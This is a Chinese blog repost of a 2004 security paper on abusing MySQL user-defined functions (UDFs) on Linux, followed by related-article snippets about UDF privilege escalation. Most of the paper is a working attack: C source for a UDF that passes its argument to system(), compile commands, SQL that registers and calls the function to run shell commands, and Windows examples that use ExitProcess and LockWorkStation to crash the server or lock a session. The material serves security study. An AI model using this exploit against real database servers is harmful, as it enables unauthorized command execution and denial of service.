mysql udf函数_Linux平台下 MYSQL用户自定义函数(UDF)的利用

最新推荐文章于 2024-04-25 20:47:12 发布
最新推荐文章于 2024-04-25 20:47:12 发布
阅读量150 收藏
点赞数
文章标签: mysql udf函数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39623273/article/details/113594535
版权

来源:http://hi.baidu.com/ylbhz

Linux平台下 MYSQL用户自定义函数(UDF)的利用

Chris Anley [chris@ngssoftware.com] 5th July 2004

根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf

通过CREATE FUNCTION语句来实现这一机制,同时通过向’mysql.func’表录入信息来加载他们.

通常当MYSQL加载这些动态库时,该动态库文件路径必须能被MYSQL访问.

攻击者会滥用这一机制别有用心地创建一些“恶毒”的动态库文件并将它们通过SELECT … INTO OUTFILE语句写入可用的目录.当这些文件创建成功过后,攻击者通过insert向mysql.func表录入信息以配置MYSQL加载这些动态库文件和执行这些函数。

下面是一段相当简单的UDF链接库的代码 (请原谅他很简陋)(老外真有礼貌!):

#include

#include

/*

compile with something like

gcc -g -c so_system.c

then

gcc -g -shared -W1,-soname,so_system.so.0 -o so_system.so.0.0 so_system.o -lc

*/

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args

{

unsigned int arg_count; /* Number of arguments */

enum Item_result *arg_type; /* Pointer to item_results */

char **args; /* Pointer to argument */

unsigned long *lengths; /* Length of string arguments */

char *maybe_null; /* Set to 1 for all maybe_null args */

Page 18

} UDF_ARGS;

typedef struct st_udf_init

{

char maybe_null; /* 1 if function can return NULL */

unsigned int decimals; /* for real functions */

unsigned long max_length; /* For string functions */

char *ptr; /* free pointer for function data */

char const_item; /* 0 if result is independent of arguments */

} UDF_INIT;

int do_system( UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)

{

if( args->arg_count != 1 )

return 0;

system( args->args[0] );

return 0;

}

像这样添加函数:

mysql> create function do_system returns integer soname ‘so_system.so’;

Query OK, 0 rows affected (0.00 sec)

现在表mysql.func类似于这样,当然你也可以使用update来修改它。

mysql> select * from mysql.func;

+———–+—–+————–+———-+

| name | ret | dl | type |

+———–+—–+————–+———-+

| do_system | 2 | so_system.so | function |

+———–+—–+————–+———-+

1 row in set (0.00 sec)

调用函数:

mysql> select do_system(‘ls > /tmp/test.txt’);

+———————————+

| do_system(‘ls > /tmp/test.txt’) |

+———————————+

| -4665733612002344960 |

+———————————+

1 row in set (0.02 sec)

即便文件权限不允许我们在目标系统上建立自己的动态库文件,我们仍然有可能利用已经存在的函数来达成一些邪恶的意图。这给攻击者的困难是,函数的参数列表和MySQL UDF的函数原型不相符:

int xxx( UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)

。。。。。。尽管诡计多端的攻击者可能能够设计出通过调用系统已存在的动态库中可控制的弱点来执行任意代码,但仍然是困难的。

Page 19

当MySQL解析执行传递的参数时,仍然可能通过现存的动态库中的函数来做“坏”事的可能性。

举个例子来讲,通过在windows中将函数ExitProcess作为MYSQL UDF来进行调用, 这将立即导致退出,即使你在mysql中并没有shutdown的权限。

mysql> create function ExitProcess returns integer soname ‘kernel32′;

Query OK, 0 rows affected (0.17 sec)

mysql> select exitprocess();

ERROR 2013: Lost connection to MySQL server during query

你也能讲当前工作站的登录会话锁定(作用相当于ctrl + del alt):

mysql> create function LockWorkStation returns integer soname ‘user32′;

Query OK, 0 rows affected (0.00 sec)

mysql> select LockWorkStation();

本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/551065,如需转载请自行联系原作者

weixin_39623273
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql udf 插件_编写MYSQL插件(UDF)使其实现Split函数
weixin_34329524的博客
02-17 151
MYSQL UDF插件好像不能返回结果集MFC DLL工程, 静态库链接, UNICODE字符编码新建cpp, 代码如下#include "stdafx.h"#include "tokenize.h"#include "mysql/mysql.h"#include #ifdef _DEBUG#define new DEBUG_NEW#endifvoid UCS2_TO_UTF8(std::stri...
mysql udf介绍_MySQL UDF 用户自定义函数
weixin_34569101的博客
01-19 1348
MySQL 数据库除了系统提供的内置函数外,还提供了用户自定义函数的功能UDF(User defined Function)。MySQL 服务已经提供了很多内置函数用户使用。如果您还是有建立新函数的需求的话,可以使用UDF。一、添加新函数的方法1、通过用户定义的函数(UDF)接口添加函数用户定义的函数被编译为库文件,然后使用CREATE FUNCTION和DROP FUNCTION语句动态地添...
linux环境下的MySQL UDF提权
最新发布
黑战士的博客
04-25 1064
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
mysql 修改函数 用户_MYSQL用户自定义函数利用Linux
weixin_33746833的博客
01-21 298
MYSQL用户自定义函数利用(Linux)Chris Anley [chris@ngssoftware.com] 5th July 2004根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf通过CREATE FUNCTION语句来实现这一机制,同时通过向'mysql.func'表录入信息来加载他们.通常当MYSQL加载这些动态库时,该动态...
179.MySQL自定义函数(UDF)
02-15 461
转存失败重新上传取消正在上传…重新上传取消正在上传…重新上传取消转存失败重新上传取消 转存失败重新上传取消正在上传…重新上传取消正在上传…重新上传取消转存失败重新上传取消 大写M就是英文,小写m就是数字 这里需要注意RETURNS定义函数返回类型,后面的RETURN相当于函数体。 转存失败重新上传取消正在上传…重新上传取消正在上传…重新上传取消转存失败重新上传取消 自定义复合结果函...
MySQL UDF自定义函数
weixin_30344995的博客
03-30 173
UDF介绍 官方介绍请点击http://dev.mysql.com/doc/refman/5.5/en/adding-functions.html UDFmysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。 背景:select count(*) from table; 上述count是mysql内部...
Linux利用UDF库实现Mysql提权
12-15
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。   要求:  在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;   过程...
使用mysql_udf与curl库完成http_post通信模块示例
01-21
使用mysql_udf与curl库完成http_post通信模块(mysql_udf,multi_curl,http,post) ...mysql_udfmysql为c语言提供的一个接口,通过这个接口,用户可以自定义mysql函数,通过调用这些mysql函数
mysql-udf-regexp:实现REGEXP _...()函数MySQL用户定义函数模块
05-01
该程序包将正则表达式函数用作MySQL用户定义函数UDF)。 该软件包实现的功能是: REGEXP_LIKE(text, pattern [, mode]) REGEXP_SUBSTR(text, pattern [,position [,occurence [,mode]]]) REGEXP_INSTR?(text, ...
mysql增加自定义函数(UDF),基于雪花算法生成分布式ID
08-22
压缩包里提供了dll和so分别用户windows和linux。只需把dll或则so放到mysql安装目录下的lib/plugin目录下,然后登录mysql执行如下命令: DROP FUNCTION IF EXISTS `SNOWFLAKE`; CREATE FUNCTION `SNOWFLAKE` RETURNS ...
mysql-notification:MySQL用户定义函数UDF)的示例
02-03
一个简单的示例,该示例在mysql中使用用户定义函数UDF)在表更改时发出实时通知。 该项目包含一个mysql插件,该插件设置一个服务器套接字,该套接字接收来自触发器的消息,该触发器连接到数据库中特定表上的INSERT...
mysql-udf-http
03-08
mysql-udf-http
MYSQL用户定义函数UDF
CD的专栏
04-07 2297
UDF资源文件UDF测试程序这里解释什么是用户定义函数UDF),是做什么的和怎样使用1)用户定义函数UDF)是什么?基本用户定义函数是一类代码,对MYSQL服务器功能进行扩充,通过添加新函数,性质就象使用本地MYSQL函数abs()或concat().UDF是用C(或C++)写的。也许还可以用BASIC,.NET或其它什么虽然我还没见过有人这么做。2)为什么和怎样使用UDF功能?从字面上何
LinuxMySQL UDF函数开发调试的方法
forevercjt的博客
01-16 664
MySQL UDF函数开发调试的方法 MySQL支持通过动态库文件扩展数据库的功能,开发范例可参考官网上的介绍:https://dev.mysql.com/doc/refman/5.6/en/adding-udf.html ,调试的时候一开始考虑在C的主函数中对函数进行调用,生成可执行文件,执行文件查看结果;但在调试通过后并部署到MySQL的server上的时候,却出现了很多的段错误,因为实际运行...
mysql udf函数_mysql udf函数怎么调用
weixin_31448735的博客
01-19 277
现有复制组成员和新加入成员版本相同,加入成功。低版本成员想加入高版本的组会被驱逐,加入失败。高版本的成员想加入低版本的组,单独加入成功,多个加入失败。例如:一个 MySQL Server 8.0.16 实例可以成功加入使用通信协议版本 5.7.24 的组。一个 MySQL Server 5.7.24 实例无法成功加入使用通信协议版本 8.0.16 的组。两个 MySQL Server 8.0.16...
MySQL 加载UDF自定义函数
lidan3959的专栏
12-11 2928
我们神一样的研发这几天抱怨mysql提供的功能太少,然后就动手自己写UDF并加载到mysql中。 至于神马是MYSQL UDF 以及作用可详见:http://dev.mysql.com/doc/refman/5.5/en/adding-functions.html 这里顺便就记录一下操作过程: 其中链接库名:lib_mysqludf_json.so (作用是解析数据库中存放的json数据)
mysqludf功能_MySQL 加载UDF自定义函数) | 学步园
weixin_39602108的博客
01-18 215
我们神一样的研发这几天抱怨mysql提供的功能太少,然后就动手自己写UDF并加载到mysql中。这里顺便就记录一下操作过程:其中链接库名:lib_mysqludf_json.so (作用是解析数据库中存放的json数据)1,上传链接库到服务器 ... ... (如果有备库,备库也得一样)2,修改属主和授可执行权限chown mysql:mysql /home/lidan/lib_mysqludf...
lib_mysqludf_sys_x64.dll
08-06
lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件。它是MySQL User-defined Function (UDF)的一部分,允许用户通过调用这个库文件中的函数来扩展MySQL服务器的功能。 lib_mysqludf_sys_x64.dll提供了一些操作系统级别的功能,例如文件和目录操作、执行外部命令和程序、读取系统环境变量等。通过在MySQL中创建自定义函数并使用这个库文件,用户可以在数据库中执行许多与操作系统相关的任务。 这个库文件是为64位系统编译的,所以只能在64位的MySQL服务器上使用。使用之前,需要将它加载到MySQL服务器中,并确保服务器和客户端的版本兼容性。 加载lib_mysqludf_sys_x64.dll的方法是通过在MySQL的配置文件中添加一行配置信息,指定库文件的路径。然后,重启MySQL服务器以使配置生效。 一旦加载成功,用户就可以在自己的数据库中创建自定义函数,通过调用这个库文件中的函数来实现特定的操作系统级别的功能。比如,可以创建一个函数来执行一个外部命令,然后将结果存储到数据库中。这样,用户就可以在数据库中操作文件、目录和其他操作系统资源。 总的来说,lib_mysqludf_sys_x64.dll是一个用于MySQL数据库的外部库文件,它扩展了MySQL服务器的功能,允许用户在数据库中执行一些操作系统级别的任务。它通过创建自定义函数并使用库文件中的函数来实现这些功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值